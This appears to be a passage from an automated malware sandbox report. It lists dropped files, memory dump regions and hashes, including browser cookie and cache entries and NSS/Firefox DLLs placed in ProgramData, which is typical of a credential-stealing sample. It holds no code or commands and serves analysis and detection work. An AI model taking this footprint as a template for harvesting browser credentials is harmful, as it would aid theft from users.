| SHA1 | 1fcfd04f2f5f34cb291a2d916e6af899160258f9 |
| SHA256 | 95fd57f641b8e2c38909090e20d6216242aa7bdab79b2e8537153acd5401a211 |
| SHA512 | 11323d67db1936defe48cc3efc8832a960af292ca3720ec3447e1c010d9409eb82a8791884277c5228775701e09b07cb7761ca517f622d41b69baeeae3ac5589 |
memory/3972-510-0x0000000000D00000-0x0000000000D18000-memory.dmp
memory/3972-512-0x0000000005800000-0x0000000005810000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TYQDTD6O.cookie
| MD5 | aeadad520b9b630793f2504b31edac8c |
| SHA1 | a16b5f5c437a95648d36715ce96e073f6b22b5c2 |
| SHA256 | 0f3120f125e5c46bf1e3dc968950972eb2c7b7062edc85f1a7f0d502dcf16d9a |
| SHA512 | 0a77faa5fcc76c76376a1760342f8acc2f53960260e7e59c1711674f77bdf44fe229605799170c9e834a5cb58f2b21dd124f79e4fcf5401c64cd18badc2b6003 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\70C71DBB8B7D2BBCA12DF82826D851E0_278EAB15C57802B8465F5CA2986E9B30
| MD5 | 9123a67a5983a9cbdb0aebcae3b599bb |
| SHA1 | 835de7a6e740769ff9eff37e349a4da911c3124c |
| SHA256 | f2e5c6c323362aa8643ea0b674b26ffbd8dc10a28cd9405c8d91e249534d789e |
| SHA512 | 517858fc0fc571bd3996f6ce918bcfec5d867b510746a5ebb03e841b79f5d0817d2121ac135c80d38574a0c71f1315358edfd66e116e0d500e449d7ba7c0e7af |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\70C71DBB8B7D2BBCA12DF82826D851E0_278EAB15C57802B8465F5CA2986E9B30
| MD5 | c3aeaf3fa0ff8548549a519aece09d01 |
| SHA1 | 0318cc87aafd737ee7a166fe8ceb9c5781f47f96 |
| SHA256 | efe8da75dda94c4afca9fad0d7a11f8840805ef853defd913be887795985ab70 |
| SHA512 | 7a9503813ecf68b41fa5447203d4ab84e1c74f1f95e010f6f9cea48cd3382405f61809f98a97dd467887584b2e0c182e74199f150088e660b6bb8c7c831da712 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
| MD5 | d8851ee7ccf673de7f63c7da10e5084f |
| SHA1 | c53c5fef62a38c252b93ca82c4dcc0ea0fa0228a |
| SHA256 | 97b2dd41230ac712ce70493486a4fc3456b448485d7d568205362bb9959891e9 |
| SHA512 | fcbd0f493ee525440745fce7a71a00f10ecc9d8216a8c87c51db455244afc25200d45fc11932cea21f7f21ef507f644234de118b4c0039323e5b3eb2b855f6fd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
| MD5 | a451cdbef0deb80d34ce8691772abfda |
| SHA1 | 0f0db194236f49c4571950f6bb44a4f07b4c0c77 |
| SHA256 | 8f9c71afb24705db84884b70b65054a492baefb1ec8dfae7955c75d1bd7bca4b |
| SHA512 | e26023cf798d362348cfae28d980c608a10395fcd83cf7eaa8a14bc6d17129e6805599e1aaa28549f9f38b40fb0c671938b5af551eff24ae7ea634b805011665 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
| MD5 | 0072f070f8240569108fb61ebc67a593 |
| SHA1 | ca4e5363abc7bab43d923a851eb7c7beb8c851cd |
| SHA256 | 0fc341bc9920a496b3cbc85687e26c64977d121d239d3bb6f71bcf0461d3f5b6 |
| SHA512 | dda7380bb83e9ba5c08f0582e972ef1873d6b0bd4b5ef911eec59b0d738b6f445a762ec70c0a826fa7850cb9b0ed4e4f1639e97e7034253309c93c17e6368ceb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D
| MD5 | 10efba54a259f93861ef0a3ed239dee2 |
| SHA1 | f438a776cd28c2f2a8a10553336bf98c097a3f68 |
| SHA256 | 8e38b1b5683b57169d5ac137e981e363cbc8fe0b755ab3890dc7d8995d8ac907 |
| SHA512 | ff4b2f4bf21f4be92644dab9c3682565644c60b836ba1a260c2b7c385acdc842a9b153c2ea39b9ef4e15dcf209eaf68b967c8f592fd425bb34e32b8bba225752 |
memory/2940-520-0x0000000004B60000-0x0000000004B9C000-memory.dmp
memory/2940-521-0x0000000007170000-0x00000000071AA000-memory.dmp
memory/2940-556-0x0000000002C40000-0x0000000002C86000-memory.dmp
memory/2940-557-0x0000000007220000-0x0000000007230000-memory.dmp
memory/2940-560-0x0000000007220000-0x0000000007230000-memory.dmp
memory/2940-561-0x0000000007220000-0x0000000007230000-memory.dmp
C:\ProgramData\vcruntime140.dll
| MD5 | a37ee36b536409056a86f50e67777dd7 |
| SHA1 | 1cafa159292aa736fc595fc04e16325b27cd6750 |
| SHA256 | 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825 |
| SHA512 | 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356 |
C:\ProgramData\freebl3.dll
| MD5 | 550686c0ee48c386dfcb40199bd076ac |
| SHA1 | ee5134da4d3efcb466081fb6197be5e12a5b22ab |
| SHA256 | edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa |
| SHA512 | 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\msvcp140.dll
| MD5 | 5ff1fca37c466d6723ec67be93b51442 |
| SHA1 | 34cc4e158092083b13d67d6d2bc9e57b798a303b |
| SHA256 | 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062 |
| SHA512 | 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546 |
C:\ProgramData\softokn3.dll
| MD5 | 4e52d739c324db8225bd9ab2695f262f |
| SHA1 | 71c3da43dc5a0d2a1941e874a6d015a071783889 |
| SHA256 | 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a |
| SHA512 | 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/3488-734-0x0000000000400000-0x0000000000472000-memory.dmp
memory/5108-867-0x0000000000400000-0x0000000000472000-memory.dmp
memory/3336-869-0x0000000000400000-0x0000000000472000-memory.dmp
memory/5016-871-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2172-873-0x0000000004A10000-0x0000000004A20000-memory.dmp
memory/1480-878-0x0000000000400000-0x0000000000472000-memory.dmp
C:\Users\Admin\AppData\Roaming\bjvcisv
| MD5 | 370715cbf360374ed76a4bc573b17d94 |
| SHA1 | 0c3e6c87488f85b865c8fe3e4c5c284d188efe1b |
| SHA256 | 678abbc0095adbd4db39e537c84066c6023927e2c13cc359bae58cc742243e99 |
| SHA512 | 167511123d38e4bb23ac7ede911b9fd306740b43707b30a49d110dbae1776eed4b1ac419a415fd506a6cadc92187574f4db64a5888c63150e31883754dfaae70 |
C:\ProgramData\02480846926978705807305974
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\ProgramData\72480087176324592609761508
| MD5 | b133605a69c0c42d03bb7e5020b86258 |
| SHA1 | ad8bb42ba6411cf8df977b47f2dbed7d4a214a0f |
| SHA256 | f0c9146c1d86eac1962b0722ccf051e8783c1e8977380cba1ce366a41861d20a |
| SHA512 | 2f32b79eccb10f524e82eab7301630a504046075a066b0383cb546b7569d2b558a4db45a9ca6743f969e9bf970896e7e0df6cc9f214542527c8bb9e0f323e15c |